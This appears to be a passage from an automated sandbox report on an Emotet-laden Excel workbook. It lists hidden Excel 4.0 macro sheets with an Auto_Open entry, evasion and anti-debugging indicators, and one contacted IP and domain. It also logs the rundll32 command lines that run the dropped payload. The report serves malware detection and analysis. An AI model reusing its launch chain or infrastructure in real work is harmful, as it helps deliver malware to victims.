Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECAA4E	3_2_01ECAA4E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED7445	3_2_01ED7445
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED3043	3_2_01ED3043
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECAE43	3_2_01ECAE43
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECCE5A	3_2_01ECCE5A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC6453	3_2_01EC6453
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED282D	3_2_01ED282D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC3228	3_2_01EC3228
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC9824	3_2_01EC9824
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC243F	3_2_01EC243F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC3432	3_2_01EC3432
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC800A	3_2_01EC800A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDC205	3_2_01EDC205
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EE261E	3_2_01EE261E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E439F10	3_2_6E439F10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E4377B4	3_2_6E4377B4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E43D530	3_2_6E43D530
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E431DE0	3_2_6E431DE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E433A90	3_2_6E433A90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E440380	3_2_6E440380
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E44E3A1	3_2_6E44E3A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E436070	3_2_6E436070
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E4410C0	3_2_6E4410C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E43A890	3_2_6E43A890
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E43E890	3_2_6E43E890
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E4368B0	3_2_6E4368B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A243F	6_2_001A243F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A9824	6_2_001A9824
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BEA55	6_2_001BEA55
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AB464	6_2_001AB464
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001C1291	6_2_001C1291
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001C20CE	6_2_001C20CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B10CD	6_2_001B10CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A92C1	6_2_001A92C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B40FE	6_2_001B40FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B9124	6_2_001B9124
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001ACF6E	6_2_001ACF6E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B3782	6_2_001B3782
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BDB87	6_2_001BDB87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001C261E	6_2_001C261E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A800A	6_2_001A800A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BC205	6_2_001BC205
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A3432	6_2_001A3432
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A3228	6_2_001A3228
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B282D	6_2_001B282D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001ACE5A	6_2_001ACE5A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A6453	6_2_001A6453
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AAA4E	6_2_001AAA4E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A544C	6_2_001A544C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B3043	6_2_001B3043
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AAE43	6_2_001AAE43
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B7445	6_2_001B7445
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AFA78	6_2_001AFA78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A387F	6_2_001A387F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BB677	6_2_001BB677
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A6869	6_2_001A6869
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A3A6C	6_2_001A3A6C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AEE60	6_2_001AEE60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BA29B	6_2_001BA29B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B009A	6_2_001B009A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BE899	6_2_001BE899
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AFE9D	6_2_001AFE9D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B0A93	6_2_001B0A93
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BCE90	6_2_001BCE90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B0E97	6_2_001B0E97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AF48A	6_2_001AF48A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AA083	6_2_001AA083
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001C1CDB	6_2_001C1CDB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B52D1	6_2_001B52D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A90D4	6_2_001A90D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B28D5	6_2_001B28D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A2CC2	6_2_001A2CC2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A46FA	6_2_001A46FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A1EFB	6_2_001A1EFB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A84F0	6_2_001A84F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B62F5	6_2_001B62F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B4CF5	6_2_001B4CF5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AC0EA	6_2_001AC0EA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B56E9	6_2_001B56E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A40E2	6_2_001A40E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A4D1E	6_2_001A4D1E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001ACB13	6_2_001ACB13
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B970A	6_2_001B970A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BE10A	6_2_001BE10A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B590E	6_2_001B590E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B3D0C	6_2_001B3D0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BBF0C	6_2_001BBF0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AF73B	6_2_001AF73B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BCD35	6_2_001BCD35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AA92F	6_2_001AA92F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B6540	6_2_001B6540
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001C0370	6_2_001C0370
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001ABD61	6_2_001ABD61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B1591	6_2_001B1591
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AB191	6_2_001AB191
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A7795	6_2_001A7795
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A358B	6_2_001A358B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A8D80	6_2_001A8D80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A4B81	6_2_001A4B81
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B85B8	6_2_001B85B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A43BE	6_2_001A43BE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A59BF	6_2_001A59BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BD7BE	6_2_001BD7BE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BE3B5	6_2_001BE3B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B89A2	6_2_001B89A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BE5A7	6_2_001BE5A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BDDA5	6_2_001BDDA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B0BA4	6_2_001B0BA4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A75D2	6_2_001A75D2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A19C0	6_2_001A19C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BEDED	6_2_001BEDED
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A51EC	6_2_001A51EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AA3E7	6_2_001AA3E7

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6E44AC90 appears 33 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6E431DE0 appears 97 times

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: CC82.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Abnormal high CPU Usage

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 98%

Found a hidden Excel 4.0 Macro sheet

Source: DOC-0212.xlsm	Macro extractor: Sheet name: Buk2
Source: DOC-0212.xlsm	Macro extractor: Sheet name: Buk5
Source: DOC-0212.xlsm	Macro extractor: Sheet name: Buk1
Source: DOC-0212.xlsm	Macro extractor: Sheet name: Buk7
Source: DOC-0212.xlsm	Macro extractor: Sheet name: EFEWF
Source: DOC-0212.xlsm	Macro extractor: Sheet name: Buk3
Source: DOC-0212.xlsm	Macro extractor: Sheet name: Buk4
Source: DOC-0212.xlsm	Macro extractor: Sheet name: Buk6

Excel documents contains an embedded macro which executes code when the document is opened

Source: workbook.xml

Binary string: \Desktop\Fil\1d\Cir\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{D6BAC37D-0CE8-4F19-A286-32FB1AEC3273}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Sheet" sheetId="1" r:id="rId1"/><sheet name="Ss1" sheetId="2" state="hidden" r:id="rId2"/><sheet name="Ss1br2" sheetId="3" state="hidden" r:id="rId3"/><sheet name="Ssbr3" sheetId="4" state="hidden" r:id="rId4"/><sheet name="EFEWF" sheetId="5" state="hidden" r:id="rId5"/><sheet name="Buk1" sheetId="6" state="hidden" r:id="rId6"/><sheet name="Buk2" sheetId="7" state="hidden" r:id="rId7"/><sheet name="Buk3" sheetId="8" state="hidden" r:id="rId8"/><sheet name="Buk4" sheetId="9" state="hidden" r:id="rId9"/><sheet name="Buk5" sheetId="10" state="hidden" r:id="rId10"/><sheet name="Buk6" sheetId="11" state="hidden" r:id="rId11"/><sheet name="Buk7" sheetId="12" state="hidden" r:id="rId12"/></sheets><definedNames><definedName name="LKLW">EFEWF!$D$3</definedName><definedName name="SASA">EFEWF!$D$17</definedName><definedName name="SASA1">EFEWF!$D$19</definedName><definedName name="SASA2">EFEWF!$D$21</definedName><definedName name="_xlnm.Auto_Open">EFEWF!$D$1</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:FV"/></xcalcf:calcFeatures></ext></extLst></workbook>

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.6051013889
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc",qEPqGlpBy
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.6051013889	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc",qEPqGlpBy	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$DOC-0212.xlsm

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRDD92.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSM@8/7@2/2

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.6051013889

Source: EXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: DOC-0212.xlsm	Initial sample: OLE zip file path = xl/worksheets/sheet4.xml
Source: DOC-0212.xlsm	Initial sample: OLE zip file path = xl/media/image1.png
Source: DOC-0212.xlsm	Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: DOC-0212.xlsm	Initial sample: OLE zip file path = xl/worksheets/_rels/sheet3.xml.rels
Source: DOC-0212.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: DOC-0212.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: DOC-0212.xlsm	Initial sample: OLE zip file path = xl/calcChain.xml

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: CC82.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC13E7 push esi; retf	3_2_01EC13F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E456A93 push ecx; ret	3_2_6E456AA6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A13E7 push esi; retf	6_2_001A13F0

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6E43E690 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,

3_2_6E43E690

Persistence and Installation Behavior:

Drops PE files

Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc (copy)	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\besta.ocx	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VZZdgPFp2xiOJtfpv[1].dll	Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc (copy)

Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\besta.ocx

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\besta.ocx

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\SysWOW64\rundll32.exe

File opened: C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Found dropped PE file which has not been started or loaded

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VZZdgPFp2xiOJtfpv[1].dll

Jump to dropped file

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Code function: 0_2_025E6753 rdtsc

0_2_025E6753

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6E450927 FindFirstFileExW,

3_2_6E450927

Source: C:\Windows\SysWOW64\rundll32.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6E44AB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_6E44AB0C

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6E43E690 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,

3_2_6E43E690

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6E431290 GetProcessHeap,HeapAlloc,RtlAllocateHeap,HeapFree,

3_2_6E431290

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Code function: 0_2_025E6753 rdtsc

0_2_025E6753

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED07D2 mov eax, dword ptr fs:[00000030h]	3_2_01ED07D2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E449990 mov eax, dword ptr fs:[00000030h]	3_2_6E449990
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E44EC0B mov ecx, dword ptr fs:[00000030h]	3_2_6E44EC0B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E4502CC mov eax, dword ptr fs:[00000030h]	3_2_6E4502CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E449920 mov esi, dword ptr fs:[00000030h]	3_2_6E449920
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E449920 mov eax, dword ptr fs:[00000030h]	3_2_6E449920
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B07D2 mov eax, dword ptr fs:[00000030h]	6_2_001B07D2

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E44A462 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6E44A462
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E44AB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6E44AB0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E450326 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6E450326

HIPS / PFW / Operating System Protection Evasion:

Yara detected Xls With Macro 4.0

Source: Yara match

File source: app.xml, type: SAMPLE

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",Control_RunDLL			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc",qEPqGlpBy			Jump to behavior

Source: EXCEL.EXE, 00000000.00000002.747989999.00000000007F0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747735618.0000000000D70000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: EXCEL.EXE, 00000000.00000002.747989999.00000000007F0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747735618.0000000000D70000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: EXCEL.EXE, 00000000.00000002.747989999.00000000007F0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747735618.0000000000D70000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6E44A584 cpuid

3_2_6E44A584

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6E44A755 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

3_2_6E44A755

Stealing of Sensitive Information:

Yara detected Emotet

Source: Yara match	File source: 3.2.rundll32.exe.2ab960.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.2ab960.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.1ec0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.1ec0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.558061657.0000000001EC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.692050034.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.555217971.000000000029D000.00000004.00000020.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
47.96.4.95	www.duoyuhudong.cn	China		37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
